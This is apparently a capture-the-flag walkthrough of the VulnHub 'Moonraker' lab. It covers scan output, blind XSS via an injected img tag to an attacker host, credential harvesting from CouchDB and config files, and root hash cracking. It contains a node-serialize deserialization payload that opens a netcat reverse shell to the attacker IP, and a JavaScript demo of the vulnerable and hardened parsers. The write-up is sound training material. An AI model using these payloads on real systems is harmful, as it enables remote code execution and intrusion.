You can download it here: https://www.vulnhub.com/entry/moonraker-1,264/

A full-range TCP port scan with service and OS detection gives:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 08:59 EDT
Nmap scan report for 192.168.227.170
Host is up (0.0016s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
| 256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
|_ 256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp open http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ couchdb: 38109
5984/tcp open couchdb?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Object Not Found
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 58
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 13:00:15 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: bbae46e2d3
| X-CouchDB-Body-Time: 0
| {"error":"not_found","reason":"Database does not exist."}
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 164
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 12:59:23 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: 331f9234f8
| X-CouchDB-Body-Time: 0
| {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
| HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 61
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 12:59:23 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: 0c2791639a
| X-Couch-Stack-Hash: 1828508689
| X-CouchDB-Body-Time: 0
|_ {"error":"unknown_error","reason":"badarg","ref":1828508689}
38109/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.70%I=7%D=6/13%Time=5D0248AC%P=i686-pc-linux-gnu%r(GetR
SF:equest,1A3,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20must-revalidate
SF:\r\nConnection:\x20close\r\nContent-Length:\x20164\r\nContent-Type:\x20
SF:application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2012:59:23\x20G
SF:MT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-Req
SF:uest-ID:\x20331f9234f8\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"couchdb\"
SF::\"Welcome\",\"version\":\"2\.2\.0\",\"git_sha\":\"2a16ec4\",\"features
SF:\":\[\"pluggable-storage-engines\",\"scheduler\"\],\"vendor\":{\"name\"
SF::\"The\x20Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,"H
SF:TTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nCache-Control:\x20mus
SF:t-revalidate\r\nConnection:\x20close\r\nContent-Length:\x2061\r\nConten
SF:t-Type:\x20application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2012
SF::59:23\x20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\n
SF:X-Couch-Request-ID:\x200c2791639a\r\nX-Couch-Stack-Hash:\x201828508689\
SF:r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":\"unknown_error\",\"reas
SF:on\":\"badarg\",\"ref\":1828508689}\n")%r(FourOhFourRequest,146,"HTTP/1
SF:\.0\x20404\x20Object\x20Not\x20Found\r\nCache-Control:\x20must-revalida
SF:te\r\nConnection:\x20close\r\nContent-Length:\x2058\r\nContent-Type:\x2
SF:0application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2013:00:15\x20
SF:GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-Re
SF:quest-ID:\x20bbae46e2d3\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":
SF:\"not_found\",\"reason\":\"Database\x20does\x20not\x20exist\.\"}\n");
MAC Address: 00:0C:29:F2:89:C9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.64 ms 192.168.227.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.28 seconds

Check the HTTP service on port 80 with dirb:
root@kali:~/cats# dirb http://192.168.227.170/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jun 13 09:02:32 2019
URL_BASE: http://192.168.227.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.170/ ----
==> DIRECTORY: http://192.168.227.170/accounting/
==> DIRECTORY: http://192.168.227.170/cats/
+ http://192.168.227.170/index.html (CODE:200|SIZE:422)
+ http://192.168.227.170/robots.txt (CODE:200|SIZE:26)
+ http://192.168.227.170/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.227.170/services/

---- Entering directory: http://192.168.227.170/accounting/ ----
+ http://192.168.227.170/accounting/index.php (CODE:200|SIZE:55)

---- Entering directory: http://192.168.227.170/cats/ ----

---- Entering directory: http://192.168.227.170/services/ ----
+ http://192.168.227.170/services/index.html (CODE:200|SIZE:1756)

-----------------
END_TIME: Thu Jun 13 09:02:43 2019
DOWNLOADED: 18448 - FOUND: 5

Following the links from http://192.168.227.170/services/ leads to an enquiry form:

http://192.168.227.170/svc-inq/sales.html

At first I thought it would be XSS, so I launched BeEF and submitted JS code through the form, but I never got a session back.

So I wrote a PHP file to see whether I could get any information from the client that renders the submissions. It dumps every HTTP_* entry of $_SERVER (the request headers, including Referer and User-Agent) and appends them to logs.txt, so the web root has to be writable by the Apache user:

<?php
// info.phtml: log the request headers of whoever fetches this file.
// PHP exposes request headers in $_SERVER with an HTTP_ prefix
// (HTTP_REFERER, HTTP_USER_AGENT, ...), so filter on that prefix.
foreach ($_SERVER as $key => $value) {
    if (strpos($key, 'HTTP_') === 0) {
        echo $key . " : " . $value . "\n";
        file_put_contents('logs.txt', $key . " : " . $value . "\n", FILE_APPEND);
    }
}
// blank lines separate one visitor's headers from the next
file_put_contents('logs.txt', "\n\n", FILE_APPEND);
?>

Then add one line to the enquiry, pointing at the attacking host (192.168.227.165):

<img src="http://192.168.227.165/info.phtml">

Wait a while and check logs.txt. Whatever reviews the submissions renders the injected tag, and its Referer header gives away the page it was viewing: /svc-inq/salesmoon-gui.php. Following the link from there leads to http://192.168.227.170/raker-sales/index.html

Some quick notes are left at:

http://192.168.227.170/raker-sales/hugo.txt

The notes quote a code snippet, and the line var obj = serialize.unserialize(str); that looks extra and useless is the bug: node-serialize's unserialize() evaluates any string value tagged with the _$$ND_FUNC$$_ marker as a JavaScript function, so whoever controls str gets command execution. The application on port 3000 demands HTTP Basic authentication, though, and I didn't have a password yet.

Another useful piece of information: CouchDB can be accessed from the web, and the password is Jaws' girlfriend's name + "x99" (without the quotes).

So jaws : dollyx99 should be the CouchDB password, but where is the login page?

Got the answer from here: https://stackoverflow.com/questions/24053792/how-to-get-couchdb-username-and-password

CouchDB 2.x serves its Fauxton admin UI, login form included, at :5984/_utils/index.html


Fauxton lists the databases, and the database named link holds some useful documents, among them this path:

http://192.168.227.170/HR-Confidential/offer-letters.html

Inside are offer letters with credentials in them:

Compiled list of credentials so far:
Username: jaws
Password: dollyx99

Username: holly
Password: ArchivesPistolsL2K

Username: hugo
Password: TempleLasersL2K

Username: guard
Password: FacProxsL2K

So now I have the credentials for hugo and can get past the Basic auth on the HTTP service on port 3000.

According to the code snippet above, the application base64-decodes the profile cookie and passes the result straight into serialize.unserialize(), which leads to RCE.

A working payload can be found here: https://paper.seebug.org/213/

{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('nc 192.168.227.165 12345 -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

The trailing () turns the function into an IIFE, so it runs the moment unserialize() evals it. The nc -e form needs a netcat built with exec support (nc.traditional or ncat), which this box evidently has.

Base64-encode it, set it as the profile cookie, and catch the reverse shell on port 12345.
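As an added example (not code from this write-up, from the box, or from node-serialize itself), here is a minimal JavaScript re-implementation of the unserialize() behaviour that makes the profile cookie dangerous, alongside a hardened parser that refuses the marker and a helper that builds the base64 cookie in the same shape as the payload above. The function names and the harmless demo body are my own; only the payload shape is taken from the page.

```javascript
// Added example, not code from the write-up, the box, or node-serialize itself.
// A minimal re-implementation of the behaviour behind node-serialize's unserialize():
// any string value tagged with the _$$ND_FUNC$$_ marker is handed to eval(), so an
// attacker who controls the serialised input controls code execution. Next to it, a
// hardened deserialiser that refuses the marker, and a helper that builds the base64
// "profile" cookie the same way the payload above is built.
const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable: mirrors node-serialize. Strings behind the marker are eval'd; because the
// payload ends in "()", the function is an IIFE and runs during deserialisation.
function unserializeVulnerable(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.indexOf(FUNCFLAG) === 0) {
      obj[key] = eval('(' + v.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Hardened: the cookie carries data, never code. Parse as plain JSON and reject
// the marker outright instead of trying to "sanitise" it.
function unserializeSafe(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.indexOf(FUNCFLAG) === 0) {
      throw new Error('refusing to deserialise a function in key "' + key + '"');
    }
  }
  return obj;
}

// Build the profile cookie: {"rce": "_$$ND_FUNC$$_function (){ <body> }()"} in base64.
// `body` is the JavaScript that should run inside the server process.
function buildProfileCookie(body) {
  const payload = { rce: FUNCFLAG + 'function (){ ' + body + ' }()' };
  return Buffer.from(JSON.stringify(payload), 'utf8').toString('base64');
}

// What the server does first: base64-decode the cookie back to the JSON string.
function decodeProfileCookie(cookie) {
  return Buffer.from(cookie, 'base64').toString('utf8');
}

// Harmless demo body (assumed placeholder): leaves a marker instead of spawning nc.
// The reverse-shell body from the write-up would go here instead.
const demoBody = "globalThis.__payloadRan = true; return 'payload ran';";

function runDemo() {
  const cookie = buildProfileCookie(demoBody);
  const json = decodeProfileCookie(cookie);
  const vulnerable = unserializeVulnerable(json);   // executes the IIFE
  let safeError = null;
  try {
    unserializeSafe(json);                          // throws, nothing executed
  } catch (e) {
    safeError = e.message;
  }
  return { cookie, json, vulnerableResult: vulnerable.rce, safeError };
}

console.log(runDemo());
```

The fix is not a regex on the cookie: as long as a deserialiser is willing to turn a string into a function, any allow-list can be bypassed by the next encoding trick. Treat cookies as plain JSON, and sign them if the server needs to trust their contents.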


Now it's showtime XD

The shell lands as jaws, the user the Node app runs as. Walked around and found nothing except the mail under /var/mail/, which I had no privilege to read.

Tried to su to the other accounts with the credentials found above, but all failed.

Found some entries in /home/jaws/.bash_history that point at the CouchDB config:

Take a look at /opt/couchdb/etc/local.ini:

jaws@moonraker:~$ cat /opt/couchdb/etc/local.ini

; CouchDB Configuration Settings

; Custom settings should be made in this file. They will override settings
; in default.ini, but unlike changes made to default.ini, this file won't be
; overwritten on server upgrade.

[couchdb]
;max_document_size = 4294967296 ; bytes
;os_process_timeout = 5000

[couch_peruser]
; If enabled, couch_peruser ensures that a private per-user database
; exists for each document in _users. These databases are writable only
; by the corresponding user. Databases are in the following form:
; userdb-{hex encoded username}
;enable = true
; If set to true and a user is deleted, the respective database gets
; deleted as well.
;delete_dbs = true
; Set a default q value for peruser-created databases that is different from
; cluster / q
;q = 1

[chttpd]
;port = 5984
;bind_address = 127.0.0.1
; Options for the MochiWeb HTTP server.
;server_options = [{backlog, 128}, {acceptor_pool_size, 16}]
; For more socket options, consult Erlang's module 'inet' man page.
;socket_options = [{recbuf, 262144}, {sndbuf, 262144}, {nodelay, true}]

[httpd]
; NOTE that this only configures the "backend" node-local port, not the
; "frontend" clustered port. You probably don't want to change anything in
; this section.
; Uncomment next line to trigger basic-auth popup on unauthorized requests.
;WWW-Authenticate = Basic realm="administrator"

; Uncomment next line to set the configuration modification whitelist. Only
; whitelisted values may be changed via the /_config URLs. To allow the admin
; to change this value over HTTP, remember to include {httpd,config_whitelist}
; itself. Excluding it from the list would require editing this file to update
; the whitelist.
;config_whitelist = [{httpd,config_whitelist}, {log,level}, {etc,etc}]

[query_servers]
;nodejs = /usr/local/bin/couchjs-node /path/to/couchdb/share/server/main.js

[couch_httpd_auth]
; If you set this to true, you should also uncomment the WWW-Authenticate line
; above. If you don't configure a WWW-Authenticate header, CouchDB will send
; Basic realm="server" in order to prevent you getting logged out.
; require_valid_user = false

[daemons]
; enable SSL support by uncommenting the following line and supply the PEM's below.
; the default ssl port CouchDB listens on is 6984
; httpsd = {chttpd, start_link, [https]}

[ssl]
;cert_file = /full/path/to/server_cert.pem
;key_file = /full/path/to/server_key.pem
;password = somepassword
; set to true to validate peer certificates
;verify_ssl_certificates = false
; Set to true to fail if the client does not send a certificate. Only used if verify_ssl_certificates is true.
;fail_if_no_peer_cert = false
; Path to file containing PEM encoded CA certificates (trusted
; certificates used for verifying a peer certificate). May be omitted if
; you do not want to verify the peer.
;cacert_file = /full/path/to/cacertf
; The verification fun (optional) if not specified, the default
; verification fun will be used.
;verify_fun = {Module, VerifyFun}
; maximum peer certificate depth
;ssl_certificate_max_depth = 1
;
; Reject renegotiations that do not live up to RFC 5746.
;secure_renegotiate = true
; The cipher suites that should be supported.
; Can be specified in erlang format "{ecdhe_ecdsa,aes_128_cbc,sha256}"
; or in OpenSSL format "ECDHE-ECDSA-AES128-SHA256".
;ciphers = ["ECDHE-ECDSA-AES128-SHA256", "ECDHE-ECDSA-AES128-SHA"]
; The SSL/TLS versions to support
;tls_versions = [tlsv1, 'tlsv1.1', 'tlsv1.2']

; To enable Virtual Hosts in CouchDB, add a vhost = path directive. All requests to
; the Virual Host will be redirected to the path. In the example below all requests
; to http://example.com/ are redirected to /database.
; If you run CouchDB on a specific port, include the port number in the vhost:
; example.com:5984 = /database
[vhosts]
;example.com = /database/

; To create an admin account uncomment the '[admins]' section below and add a
; line in the format 'username = password'. When you next start CouchDB, it
; will change the password to a hash (so that your passwords don't linger
; around in plain-text files). You can add more admin accounts with more
; 'username = password' lines. Don't forget to restart CouchDB after
; changing this.
[admins]
;admin = mysecretpassword
;
;REMOVING Hugo's Admin access until front end is complete, uncomment to change -Jaws
;hugo = 321Blast0ff!!

Another set of credentials: hugo : 321Blast0ff!! Because the line is commented out, CouchDB never parsed it and so never replaced it with a hash on startup, which is why the plaintext survives in the file.

Tried to su to hugo with it and succeeded, and the mail spool is now readable:

hugo@moonraker:/var/mail$ cat /var/mail/hugo

From moonrakertech@moonraker.localdomain Fri Oct 5 19:11:17 2018
Return-Path: <moonrakertech@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1003)
id 81CA720405; Fri, 5 Oct 2018 19:11:17 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: RE:Root Access
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181005231117.81CA720405@moonraker.localdomain>
Date: Fri, 5 Oct 2018 19:11:17 -0400 (EDT)
From: moonrakertech@moonraker.localdomain

Mr. Hugo Drax, I don't care if you're the president of the United States, You will need to create a ticket for this request. Do you not understand the IT request process or do we need to require more mandatory online training?

From moonrakertech@moonraker.localdomain Fri Oct 5 19:39:51 2018
Return-Path: <moonrakertech@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1003)
id DEF0A20410; Fri, 5 Oct 2018 19:39:51 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: RE:RE:RE:Root Access
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181005233951.DEF0A20410@moonraker.localdomain>
Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT)
From: moonrakertech@moonraker.localdomain

Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.

Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes.

Have fun with the decryption process "Boss"! Haha!

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

From hr@moonraker.localdomain Fri Oct 5 20:24:20 2018
Return-Path: <hr@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1000)
id 2412120452; Fri, 5 Oct 2018 20:24:20 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: Decompression Accident
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181006002420.2412120452@moonraker.localdomain>
Date: Fri, 5 Oct 2018 20:24:20 -0400 (EDT)
From: hr@moonraker.localdomain

Mr. Hugo, since you were a witness to Moonrakertech's accident, you'll have to write up a statement. Just stick to the basics like we talked about. Jaws deleted the camera footage, and there were no witnesses.

OK, now I have the old root hash:

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

The $6$ prefix marks it as sha512crypt, so crack it with john. The mail says the current password is the old one with "VR00M" appended, so john's result plus VR00M is the root password.

Using cyberVR00M to log in as root.